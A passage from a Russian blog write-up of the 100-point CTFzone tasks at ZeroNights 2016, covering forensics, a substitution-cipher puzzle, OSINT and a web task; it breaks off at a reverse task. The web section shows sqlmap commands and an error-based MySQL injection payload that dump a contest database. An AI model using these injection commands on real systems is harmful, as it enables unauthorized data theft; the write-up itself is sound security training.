{"id":281380,"date":"2016-11-23T00:40:04","date_gmt":"2016-11-22T21:40:04","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=281380"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=281380","title":{"rendered":"[ZeroNights2016] [CTFzone] \u0411\u0435\u0437 100 \u0433\u0440\u0430\u043c\u043c \u043d\u0435 \u0440\u0430\u0437\u0431\u0435\u0440\u0451\u0448\u044c\u0441\u044f"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/a25\/45e\/3b0\/a2545e3b056f48a1a133ae12207d5f90.jpg\" align=\"left\"\/><br \/>  <br clear=\"left\"\/>  <\/p>\n<hr\/>\n<p>  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0446\u0438\u043a\u043b \u0441\u0442\u0430\u0442\u0435\u0439, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0439 \u0432\u0440\u0430\u0439\u0442\u0430\u043f\u0443 \u043f\u043e CTFzone, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b 17 \u0438 18 \u043d\u043e\u044f\u0431\u0440\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 ZeroNights2016 \u043f\u043e\u0434 \u0444\u043b\u0430\u0433\u043e\u043c Bi.Zone. \u0412 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043c\u044b \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u0445, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u0438\u043d\u043e\u0441\u0438\u043b\u043e \u043f\u043e 100 \u043e\u0447\u043a\u043e\u0432 \u0432 \u043f\u043e\u043b\u044c\u0437\u0443 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432!<br \/>  <a name=\"habracut\"><\/a>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0437 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0446\u0438\u043a\u043b\u0430<\/b><\/p>\n<div class=\"spoiler_text\"><a href=\"https:\/\/habrahabr.ru\/post\/315876\/\">1) \u0420\u0430\u0437\u0431\u043e\u0440 \u043f\u043e\u043b\u0451\u0442\u043e\u0432 \u0437\u0430 50<\/a>  <\/div>\n<\/div>\n<p>  \u041e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0441\u043f\u0430\u0441\u0438\u0431\u043e <a href=\"https:\/\/habrahabr.ru\/users\/gh0st3rs\/\" class=\"user_link\">GH0st3rs<\/a> \u0437\u0430 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432\u0440\u0430\u0439\u0442\u0430\u043f\u044b \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439.<\/p>\n<h5><b>FORENSIC100 \u2014 Master of Strings<\/b><\/h5>\n<p>  <\/p>\n<blockquote><p>Rise and shine, Lieutenant, stop dreaming of drinking vodka and playing with the bear. A.U.R.O.R.A. is speaking and it\u2019s time you stopped sleeping at your workplace. You can\u2019t idle your time anymore as the whole world might go down the drain unless, well\u2026 Let&#8217;s say it\u2019s time you are back in the game. The right man in the wrong place can change the world. So wake up, Lieutenant, find a password for the Spaceship panel and join the forces on Earth!<\/p><\/blockquote>\n<p>  \u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0441\u044f 7z \u0430\u0440\u0445\u0438\u0432 \u0441 \u0444\u0430\u0439\u043b\u043e\u043c &#8216;.RAM&#8217; \u0432\u043d\u0443\u0442\u0440\u0438. \u041b\u043e\u0433\u0438\u0447\u043d\u043e, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043b\u0435\u043f\u043e\u043a \u041e\u0417\u0423. \u0411\u044b\u043b\u043e \u043f\u0440\u0438\u043d\u044f\u0442\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u0443 &#8216;Volatility&#8217;. \u0415\u0449\u0451 \u0440\u0430\u0437 (\u0434\u0432\u0430\/\u0442\u0440\u0438) \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0438 \u043f\u0440\u043e\u043b\u0438\u0441\u0442\u0430\u0432 Wiki \u043f\u043e Volatility, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0440\u0430\u0437\u0434\u0435\u043b \u00abStrings\u00bb \u0438 \u0443\u0432\u0438\u0434\u0435\u0442\u044c <a href=\"https:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb897439\">\u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 SysInternals Strings<\/a>. \u0420\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0435\u0451 \u043c\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c:<\/p>\n<pre><code>strings.exe task_forensic_100.ram &gt; output<\/code><\/pre>\n<p>  \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c output \u043d\u0430 ~70\u041c\u0411 \u0438\u0437 \u0441\u0442\u0440\u043e\u043a UNICODE \u0434\u043b\u0438\u043d\u043e\u0439 \u0431\u043e\u043b\u0435\u0435 3 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 (\u043f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e). <br \/>  \u041e\u0442\u043a\u0440\u044b\u0432 \u0435\u0433\u043e \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u043c \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u043e\u043c, \u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b\u0441\u044f \u043d\u0430 \u043f\u043e\u0438\u0441\u043a\u0438 \u0444\u043b\u0430\u0433\u0430, \u2014 \u00ab\u0410 \u0432\u0434\u0440\u0443\u0433?\u00bb. <br \/>  \u041a\u0430\u043a\u043e\u0432\u043e \u0436\u0435 \u0431\u044b\u043b\u043e \u043c\u043e\u0451 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u0435:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/32d\/23b\/48b\/32d23b48bb7b450fb6bf65e418e74e01.png\" \/><\/div>\n<p>  \u041a\u0430\u043a \u043f\u043e\u0442\u043e\u043c \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c: \u043c\u043e\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043d\u0435 \u0442\u0430\u043a\u0438\u043c, \u043a\u0430\u043a\u0438\u043c \u0435\u0433\u043e \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043b \u00ab\u0430\u0432\u0442\u043e\u0440\u00bb. \u041d\u0443, \u0447\u0442\u043e \u0436\u0435, \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0442\u0430\u043a \u0434\u0430\u0436\u0435 \u043b\u0443\u0447\u0448\u0435.<\/p>\n<h5><b>MISC100 \u2014 Nerdy Mechanic<\/b><\/h5>\n<p>  <\/p>\n<blockquote><p>A.U.R.O.R.A.: Lieutenant, let me introduce you to Sergeant Varvara. She needs your help.<br \/>  Sergeant Varvara: Lieutenant, this terminal is not working. I entered my request but there is some gibberish on the screen. Our air mechanic was the last to work on this terminal. Would you take a look?<\/p><\/blockquote>\n<p>  \u041d\u0438\u0436\u0435 \u043d\u0430\u043c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0442\u043e\u0442 \u0441\u0430\u043c\u044b\u0439 \u00ab\u043a\u0440\u0438\u0432\u043e\u0439\u00bb \u0432\u044b\u0432\u043e\u0434 \u0438\u0437 \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0430:<\/p>\n<pre><code class=\"bash\">why ir -iagp irbie -t cifap iw;-pfqlfrg -sfm DFG gukjlpi.cym\/dnwalwbw pfrfg<\/code><\/pre>\n<p>  \u0427\u0442\u043e \u0436\u0435 \u0441 \u044d\u0442\u0438\u043c \u0434\u0435\u043b\u0430\u0442\u044c? \u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u0435\u0435: \u043a\u043e\u043d\u0435\u0446 \u043f\u044f\u0442\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u043e\u0447\u0435\u043d\u044c \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u0441\u0441\u044b\u043b\u043a\u0443. \u041e\u0434\u043d\u0430\u043a\u043e, \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c: &#8216;y&#8217; -&gt; &#8216;o&#8217;. \u0422\u043e\u0433\u0434\u0430 \u0438 \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0435 &#8216;why&#8217; \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432 &#8216;who&#8217; \u2014 \u0410\u0433\u0430! \u2014 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 Bash. \u041c\u043e\u0436\u0435\u0442 \u0432 \u044d\u0442\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0438 \u0431\u044b\u043b\u0430 \u043d\u0435\u043a\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0430 \u043f\u043e\u0434\u043c\u0435\u043d\u044b \u0431\u0443\u043a\u0432, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430\u0431\u0440\u043e\u0441\u0430\u0432 \u043f\u0440\u043e\u0441\u0442\u0435\u043d\u044c\u043a\u0438\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0432 Python \u043c\u0435\u0442\u043e\u0434\u043e\u043c \u043f\u0440\u043e\u0431, \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0448\u043b\u043e \u0441\u0430\u043c\u043e \u0441\u043e\u0431\u043e\u0439:<\/p>\n<pre><code class=\"python\">print(text.replace('y','o').replace('j','y').replace('n','j').replace('k','n').replace('u','v').replace('l','u').replace('i','l').replace('r','s').replace('e','k').replace('f','e').replace('p','r').replace('g','t').replace('G','T').replace(';','p').replace('d','g').replace('D','G').replace('F','E').replace('v','i'))<\/code><\/pre>\n<p>  \u0412 \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n<pre><code class=\"bash\">who  ls -latr  lsblk -t  clear  lwp-request -sem GET tinyurl.com\/gjwauwbw  reset <\/code><\/pre>\n<p>  \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0438 \u0432\u0438\u0434\u0438\u043c \u0444\u043b\u0430\u0433: ctfzone{182ac24a3b2dc86ba298f57d9c391c0b}<\/p>\n<h5><b>WEB100 \u2014 Search Engine<\/b><\/h5>\n<p>  <\/p>\n<blockquote><p>Lieutenant (You): A.U.R.O.R.A., I\u2019m in the SNT-47 compartment, in the general-purpose room. Thermal signatures are missing. I need to find a way to connect to the ship communications and it\u2019s urgent, what should I do?<br \/>  A.U.R.O.R.A.: Welcome to the information retrieval system A.U.R.O.R.A. Please name your identification number.<br \/>  You: What identification number?! Are you broken as well?? Let&#8217;s see what you have inside if I don\u2019t want to stay here forever&#8230;<\/p><\/blockquote>\n<p>  \u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0430\u0441\u044c \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0430\u0439\u0442 \u0441 \u0444\u043e\u0440\u043c\u043e\u0439 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/f8f\/007\/130\/f8f0071308b14261a9a7d6f1be53f2f4.png\" \/><\/div>\n<p>  \u0421 \u0447\u0435\u0433\u043e \u043d\u0430\u0447\u0430\u0442\u044c? \u041f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e: \u0441 \u043f\u043e\u0438\u0441\u043a\u0430 \u043f\u043e \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c\u0443 \u043a\u043e\u0434\u0443 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b. \u0418\u0434\u0451\u043c \u0442\u0443\u0434\u0430 \u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c:<\/p>\n<pre><code>&lt;script src=\/static\/js\/pewpew.js type=&quot;text\/javascript&quot;&gt;&lt;\/script&gt;<\/code><\/pre>\n<p>  \u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c, \u0441\u043c\u043e\u0442\u0440\u0438\u043c:<\/p>\n<pre><code>     if ('s3cr3tuser' === $(ctrls[0]).find('input').val()      && 'v3rySTr0ngP@ss' === $(ctrls[1]).find('input').val()) {<\/code><\/pre>\n<p>  \u041d\u0435\u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u043c \u0432\u0437\u0433\u043b\u044f\u0434\u043e\u043c \u043c\u044b \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u043c \u0447\u0442\u043e \u043a \u0447\u0435\u043c\u0443. \u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0444\u043e\u0440\u043c\u0443 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0438\u0434\u0451\u043c \u0434\u0430\u043b\u044c\u0448\u0435. \u041f\u0435\u0440\u0435\u0434 \u043d\u0430\u043c\u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0441 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439 \u043f\u043e\u0438\u0441\u043a\u0430. \u00ab\u0410 \u043d\u0435 SQLi \u043b\u0438 \u0437\u0434\u0435\u0441\u044c \u0447\u0430\u0441\u043e\u043c?\u00bb, \u2014 \u0434\u043e\u043b\u0436\u043d\u043e \u043f\u043e\u0441\u043b\u044b\u0448\u0430\u0442\u044c\u0441\u044f \u0432 \u0433\u043e\u043b\u043e\u0432\u0435. \u0418\u0434\u0451\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c: \u0431\u0438\u043d\u0433\u043e!<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/d51\/82a\/111\/d5182a111cab4707a0ca04037293bd82.png\" \/><\/div>\n<p>  \u0427\u0442\u043e \u0436\u0435, \u0440\u0430\u0441\u0447\u0435\u0445\u043b\u044f\u0435\u043c \u0441\u0442\u0430\u0440\u044b\u0439 \u0434\u043e\u0431\u0440\u044b\u0439 SqlMap (\u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u043c\u043e\u0436\u043d\u043e \u0438 \u0440\u0443\u043a\u0430\u043c\u0438). \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u044b \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u043b\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e =&gt; \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c Cookies. \u0412 \u0446\u0435\u043b\u044f\u0445 \u044d\u043a\u043e\u043d\u043e\u043c\u0438\u0438 \u043c\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u00ab\u0432\u044b\u0432\u043e\u0434\u00bb \u043d\u0435 \u043f\u043e\u043b\u043d\u044b\u0439:<\/p>\n<pre><code class=\"bash\">root@hackzard:~# sqlmap -u &quot;http:\/\/78.155.219.6\/search\/param1*&quot; --cookie=&quot;session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg&quot; --level=3 --dbms=MySQL --tables<\/code><\/pre>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0412\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/b><\/p>\n<div class=\"spoiler_text\"><code>Parameter: #1* (URI)<br \/>   Type: error-based<br \/>   Title: MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br \/>   Payload: http:\/\/78.155.219.6:80\/search\/param1'||(SELECT 'bGEm' FROM DUAL WHERE 8985=8985 AND (SELECT 1912 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1912=1912,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'<br \/>  ---<br \/>  [18:30:29] [INFO] testing MySQL<br \/>  [18:30:29] [INFO] confirming MySQL<br \/>  [18:30:29] [INFO] the back-end DBMS is MySQL<br \/>  back-end DBMS: MySQL &gt;= 5.0.0<br \/>  [18:30:29] [INFO] fetching database names<br \/>  [18:30:29] [INFO] the SQL query used returns 5 entries<br \/>  [18:30:29] [INFO] resumed: information_schema<br \/>  [18:30:29] [INFO] resumed: mysql<br \/>  [18:30:29] [INFO] resumed: performance_schema<br \/>  [18:30:29] [INFO] resumed: sqli_100<br \/>  [18:30:29] [INFO] resumed: sys<br \/>  [18:30:29] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, sqli_100, sys'<br \/>  [18:30:29] [INFO] the SQL query used returns 282 entries<\/code>  <\/div>\n<\/div>\n<p>  <\/p>\n<pre><code class=\"bash\">root@hackzard:~# sqlmap -u &quot;http:\/\/78.155.219.6\/search\/param1*&quot; --cookie=&quot;session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg&quot; --level=3 --dbms=MySQL -D &quot;sqli_100&quot; -T &quot;wtf3thisiss3crettable_dont_read_dont_touch&quot; --columns<\/code><\/pre>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0412\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/b><\/p>\n<div class=\"spoiler_text\"><code>Database: sqli_100<br \/>  Table: wtf3thisiss3crettable_dont_read_dont_touch<br \/>  [2 columns]<br \/>  +--------+--------------+<br \/>  | Column | Type |<br \/>  +--------+--------------+<br \/>  | id | int(5) |<br \/>  | secret | varchar(500) |<br \/>  +--------+--------------+<\/code>  <\/div>\n<\/div>\n<p>  <\/p>\n<pre><code class=\"bash\">root@hackzard:~# sqlmap -u &quot;http:\/\/78.155.219.6\/search\/param1*&quot; --cookie=&quot;session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg&quot; --level=3 --dbms=MySQL -D &quot;sqli_100&quot; -T &quot;wtf3thisiss3crettable_dont_read_dont_touch&quot; -C &quot;secret&quot; --dump<\/code><\/pre>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0412\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/b><\/p>\n<div class=\"spoiler_text\"><code>Database: sqli_100<br \/>  Table: wtf3thisiss3crettable_dont_read_dont_touch<br \/>  [13 entries]<br \/>  +-----------------------------------------+<br \/>  | secret |<br \/>  +-----------------------------------------+<br \/>  | 089b1d5d37c22d81b55b6f77c9e2b042 |<br \/>  | asdkkjhjsdaojewifdiowuefdw0 |<br \/>  | asdkkjhjsdaojewifdiowuefdw0 |<br \/>  | dskjhwjkfhsjdkfhsjdkhfjk |<br \/>  | dskjhwjkfhsjdkfhsjdkhfjk |<br \/>  | dskjhwjkfhsjdkfhsjdkhfjk |<br \/>  | dskjhwjkfhsjdkfhsjdkhfjk |<br \/>  | lfhdwrekfgbuhwoeijfdweoifjweoif |<br \/>  | lfhdwrekfgbuhwoeijfdweoifjweoif |<br \/>  | lfhdwrekfgbuhwoeijfdweoifjweoif |<br \/>  | lfhdwrekfgbuhwoeijfdweoifjweoif |<br \/>  | REMEMBER_FLAG_FORMAT.FLAG_IN_THIS_TABLE |<br \/>  | REMEMBER_FLAG_FORMAT.FLAG_IN_THIS_TABLE |<br \/>  +-----------------------------------------+<\/code>  <\/div>\n<\/div>\n<p>  \u041d\u0430\u0441 \u043f\u0440\u043e\u0441\u044f\u0442 \u043d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0442\u044c \u0444\u043e\u0440\u043c\u0430\u0442 \u0444\u043b\u0430\u0433\u0430, \u0432\u0435\u0434\u044c \u043e\u043d \u0432 \u044d\u0442\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u0435. \u0410 \u0432\u043e\u0442 \u0438 \u043e\u043d: ctfzone{089b1d5d37c22d81b55b6f77c9e2b042}<\/p>\n<h5><b>OSINT100 \u2014 Weird Guy<\/b><\/h5>\n<p>  <\/p>\n<blockquote><p>A.U.R.O.R.A.: Lieutenant, our agents sneaked in Cosmos hotel and witnessed the preparations for ZERONIGHTS 2016. Everyone was busy installing their stands and making photos. There was a weird guy in the hall who was absorbed in reading something on his laptop. We couldn\u2019t figure out who was this guy but we need to know what he was looking at the screen. This photo might help you.<\/p><\/blockquote>\n<p>  \u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0430\u0441\u044c \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/d07\/704\/e19\/d07704e195944abc866ba8f453c6d726.jpg\" \/><\/div>\n<p>  \u041d\u0430 \u0444\u043e\u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u043a\u0430\u043a <s>\u0441\u0435\u043b\u0444\u044f\u0442\u0441\u044f<\/s> \u043e\u0434\u0438\u043d \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0440\u0443\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0433\u043e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u043c\u044b\u0439 \u044d\u043a\u0440\u0430\u043d \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438. \u0417\u0430\u0434\u0430\u0447\u0430 \u044f\u0441\u043d\u0430: \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043d\u0430\u0439\u0442\u0438 \u0444\u043e\u0442\u043e \u0441 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0430\u043a\u0443\u0440\u0441\u0430. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 CTF \u043d\u043e\u0441\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u043d\u0430\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440 \u0437\u0430\u0434\u0430\u0451\u043c\u0441\u044f \u0432\u043e\u043f\u0440\u043e\u0441\u043e\u043c: \u00ab\u041a\u0430\u043a\u043e\u0439 \u0441\u0430\u0439\u0442 \u043d\u0430\u043c \u043d\u0443\u0436\u0435\u043d?\u00bb. \u041f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u2014 Instagram. \u0414\u0430\u043b\u0435\u0435, \u044d\u0442\u0430 \u0437\u0430\u0434\u0430\u0447\u0430 \u0438\u043c\u0435\u043b\u0430 \u0431\u044b \u0434\u0432\u0430 \u0440\u0435\u0448\u0435\u043d\u0438\u044f:  <\/p>\n<ul>\n<li>\u041e\u0441\u043e\u0437\u043d\u0430\u0432\u0430\u044f, \u0447\u0442\u043e \u0444\u043e\u0442\u043e\u0441\u044a\u0435\u043c\u043a\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u043b\u0430 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 ZeroNights2016 \u043d\u0430 \u0442\u0435\u0440\u0440\u0438\u0442\u043e\u0440\u0438\u0438 \u0413\u041a \u00ab\u041a\u043e\u0441\u043c\u043e\u0441\u00bb \u2014 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0438\u0441\u043a \u043f\u043e \u0413\u0435\u043e\u0422\u0435\u0433\u0430\u043c. \u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c, \u043f\u043e \u043f\u0440\u0438\u0447\u0438\u043d\u0435 \u043d\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0432 Instagram API;<\/li>\n<li>\u041c\u0435\u0442\u043e\u0434\u043e\u043c \u043f\u0440\u043e\u0431 \u0438 \u043e\u0448\u0438\u0431\u043e\u043a \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0442\u044c \u0432\u0441\u0435 #\u0445\u0435\u0448\u0442\u0435\u0433\u0438, \u043a\u0430\u043a\u0438\u043c-\u0442\u043e \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 CTF, Bi.Zone \u0438\u043b\u0438 ZeroNights \u0432 \u0446\u0435\u043b\u043e\u043c. <\/li>\n<\/ul>\n<p>  \u0421\u043f\u0443\u0441\u0442\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0432\u0442\u043e\u0440\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431) \u0438\u0441\u043a\u043e\u043c\u044b\u0439 \u0445\u0435\u0448\u0442\u0435\u0433 \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d: #zn2016. \u0410 \u0432\u043e\u0442 \u0438 \u0438\u0441\u043a\u043e\u043c\u0430\u044f \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f:<\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/000\/c35\/f00\/000c35f00f8e4d21b8ddda9f58ce60d2.jpg\" \/><\/div>\n<p>  \u0424\u043b\u0430\u0433: ctfzone{Os1nT_G4nGsT3r}<\/p>\n<h5><b>REVERSE100 \u2014 The Doors Of Dorun<\/b><\/h5>\n<p>  <\/p>\n<blockquote><p>**A.U.R.O.R.A.: ** Lieutenant, your co-pilot was abducted by aliens and put into prison. They are out hunting now and it\u2019s your chance to set him free! He is held behind the 